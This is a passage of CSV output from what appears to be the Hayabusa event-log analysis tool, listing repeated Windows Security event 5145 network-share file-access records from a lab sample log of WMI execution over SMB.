Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 